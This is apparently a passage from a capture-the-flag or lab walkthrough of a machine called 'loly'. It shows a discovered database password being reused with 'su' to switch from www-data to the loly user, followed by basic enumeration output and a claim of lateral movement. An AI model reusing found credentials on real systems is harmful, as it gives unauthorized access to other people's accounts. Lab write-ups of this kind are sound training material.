loly


Testing the discovered DB password, lolyisabeautifulgirl, for password reuse against the loly user

www-data@ubuntu:/$ su loly
Password: lolyisabeautifulgirl
 
loly@ubuntu:/$ whoami
loly
loly@ubuntu:/$ hostname
ubuntu
loly@ubuntu:/$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
3: ens224: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
    link/ether 00:50:56:9e:36:61 brd ff:ff:ff:ff:ff:ff
    inet 192.168.120.121/24 brd 192.168.120.255 scope global ens224
       valid_lft forever preferred_lft forever
    inet6 fe80::250:56ff:fe9e:3661/64 scope link 
       valid_lft forever preferred_lft forever

Password reuse confirmed. Lateral Movement made to the loly user.